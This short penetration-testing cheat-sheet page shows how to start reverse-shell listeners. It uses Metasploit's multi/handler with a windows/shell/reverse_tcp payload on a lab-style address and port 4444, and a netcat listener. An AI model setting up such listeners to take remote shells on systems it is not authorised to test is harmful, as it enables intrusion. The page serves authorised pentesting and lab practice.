Listener Setup

Metasploit multi/handler listener

use exploit/multi/handler
// The payload should be the same as the one, you used to generate 
the payload using msfvenom
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.27
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

Netcat listener for unstaged payload

nc -nvlp 4444
nc: listening on :: 4444 ...
nc: listening on 0.0.0.0 4444 ...

Last updated